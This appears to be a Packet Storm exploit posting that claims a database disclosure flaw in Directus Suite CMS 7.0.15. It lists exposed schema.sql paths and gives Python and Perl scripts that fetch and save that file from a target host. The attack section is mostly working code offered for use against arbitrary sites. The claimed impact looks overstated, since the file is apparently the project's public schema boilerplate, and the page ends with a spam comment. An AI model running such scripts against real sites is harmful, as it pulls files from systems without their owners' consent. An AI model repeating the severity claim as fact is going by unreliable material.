what you don't know can hurt you

Directus Suite CMS 7.0.15 Database Disclosure

Directus Suite CMS 7.0.15 Database Disclosure
Posted Apr 2, 2019
Authored by KingSkrupellos

Directus Suite CMS version 7.0.15 suffers from a database disclosure vulnerability.

tags | exploit, info disclosure
MD5 | 74e365d54904b61c4e9289a057f5d0a9

Directus Suite CMS 7.0.15 Database Disclosure

Change Mirror Download
###########################################################################

# Exploit Title : Directus Suite CMS 7.0.15 Database Disclosure Exploit
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 02/04/2019
# Vendor Homepage : directus.io
# Software Download Link : github.com/directus/directus/archive/master.zip
# Software Information Link : docs.directus.io/guides/database.html#directus-schema
github.com/directus/directus
# Software Version : 7 - 7.0.9 - 7.0.15
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type :
CWE-200 [ Information Exposure ]
CWE-538 [ File and Directory Information Exposure ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Acunetix Information Link about => MySQL database dump
acunetix.com/vulnerabilities/web/mysql-database-dump/

###########################################################################

# Description about Software :
***************************
Directus 7 Suite — Future-Proof Headless CMS & API for Custom Databases.

Directus is an open-source suite of software that provides an instant API wrapper for SQL databases

and an intuitive Admin App for non-technical users to manage that content. It's like a safe, friendly, and

super-powered "database client" (eg: PHP-my-Admin or Sequel Pro).

###########################################################################

# Impact :
***********
* The product stores sensitive information in files or directories that are accessible

to actors outside of the intended control sphere.

* An information exposure is the intentional or unintentional disclosure of information

to an actor that is not explicitly authorized to have access to that information.

* A database dump contains a record of the table structure and/or the data from a database

and is usually in the form of a list of SQL statements. A database dump is most often used for

backing up a database so that its contents can be restored in the event of data loss.

This file contains a MySQL database dump. This information is highly sensitive

and should not be found on a production system.

* Remediation - Restrict access to this file or remove it from the system.

Information :
************
Database-First =>

Directus follows a database-first approach, storing all of your data unaltered
in pure SQL databases with that can be completely customized.

Access and Optimization =>

Directus mirrors your actual database so it will automatically stay in sync with
any changes made directly to the database! With the full power of SQL unlocked, you can:
Architect your actual database with meaningful table and column names
Infinitely optimize with indexing, datatypes, lengths, defaults, keys, encoding, etc
Update your database schema at any point and Directus will instantly reflect changes
Create, update, and delete content directly from the database

Direct Access =>

This database-first approach means that you have the option to completely bypass
Directus if needed. Connecting your application directly to the database means Directus is completed.

Creating a Database

# MySQL
Connect to MySQL:

$ mysql -h <host> -u <user> -p

The command above will ask you for the user password:

$ mysql -h localhost -u root -p
Enter password: ****

After you successfully log into MySQL, run the CREATE DATABASE command:

mysql> CREATE DATABASE directus;
Query OK, 1 row affected (0.00 sec)
# Directus Schema

This document provides an explanation of all tables and fields within the Directus schema boilerplate.

Name Description
directus_activity Log of all actions (eg: item updates) performed through the API (or App)
directus_activity_read Tracks if a user has seen an Activity/Message item
directus_collection_presets User's collection preferences and bookmarks for Item Listing page
directus_collections Information for database tables (collections) managed by Directus
directus_fields Information for database columns (fields) and their interfaces
directus_files Metadata for all files and embeds added to Directus
directus_folders Nestable virtual directories used to organize Directus files
directus_migrations Database schema changes for upgrades/downgrades created by Phinx
directus_permissions Defines specific API access rules for a specific Role
directus_relations Keys and junctions for field-level relationships between collections
directus_revisions The delta and full data snapshot for all item Activity (eg: updates)
directus_roles Listing of user roles that group together sets of permissions
directus_settings Ad-hoc key-value-pairs for storing Global and Extension settings
directus_user_roles Junction table allowing users to possess multiple roles
directus_users Directory of all App and API Users

###########################################################################

File :
*****
/directus/src/schema.sql

/src/schema.sql

/schema.sql

Information :
************
# Sequel Pro SQL dump
# Version 4541
# Host: localhost (MySQL 5.6.38)
# Database: directus

# Dump of table directus_activity

# Dump of table directus_activity_seen

# Dump of table directus_collection_presets

# Dump of table directus_collections

# Dump of table directus_fields

# Dump of table directus_files

# Dump of table directus_folders

# Dump of table directus_migrations

# Dump of table directus_permissions

# Dump of table directus_relations

# Dump of table directus_revisions

# Dump of table directus_roles

# Dump of table directus_settings

# Dump of table directus_user_roles

# Dump of table directus_users

###########################################################################

# Database Disclosure Information Exposure Exploit 1 :
***********************************************
#!/usr/bin/python
import string
import re
from urllib2 import Request, urlopen
disc = "/src/schema.sql"
url = raw_input ("URL: ")
req = Request(url+disc)
rta = urlopen(req)
print "Result"
html = rta.read()
rdo = str(re.findall("resources.*=*", html))
print rdo
exit

###########################################################################

# Database Disclosure Information Exposure Exploit 2 :
***********************************************
#!/usr/bin/perl -w
# Author : KingSkrupellos
# Team : Cyberizm Digital Security Army

use LWP::Simple;
use LWP::UserAgent;

system('cls');
system('Directus Suite CMS 7.0.15 Database Disclosure Exploit');
system('color a');


if(@ARGV < 2)
{
print "[-]How To Use\n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}
($TargetIP, $path, $File,) = @ARGV;

$File="src/schema.sql";
my $url = "http://" . $TargetIP . $path . $File;
print "\n Wait Please Dear Hacker!!! \n\n";

my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "D:/src/schema.sql");

if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to D:/src/schema.sql\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}

###########################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

###########################################################################

Comments (1)

RSS Feed Subscribe to this comment feed
gennyswiss0

I have been noticing some error in the backup of the data from the database which I am trying to fix with itunessupport.org/blog/itunes-could-n… as I am unable to access both my iPhone and iTunes properly.

Comment by gennyswiss0
2019-04-03 08:16:29 UTC | Permalink | Reply
Login or Register to post a comment

File Archive:

February 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    1 Files
  • 2
    Feb 2nd
    2 Files
  • 3
    Feb 3rd
    17 Files
  • 4
    Feb 4th
    15 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    16 Files
  • 7
    Feb 7th
    19 Files
  • 8
    Feb 8th
    1 Files
  • 9
    Feb 9th
    2 Files
  • 10
    Feb 10th
    15 Files
  • 11
    Feb 11th
    20 Files
  • 12
    Feb 12th
    12 Files
  • 13
    Feb 13th
    18 Files
  • 14
    Feb 14th
    17 Files
  • 15
    Feb 15th
    4 Files
  • 16
    Feb 16th
    4 Files
  • 17
    Feb 17th
    34 Files
  • 18
    Feb 18th
    15 Files
  • 19
    Feb 19th
    19 Files
  • 20
    Feb 20th
    20 Files
  • 21
    Feb 21st
    15 Files
  • 22
    Feb 22nd
    2 Files
  • 23
    Feb 23rd
    2 Files
  • 24
    Feb 24th
    16 Files
  • 25
    Feb 25th
    37 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close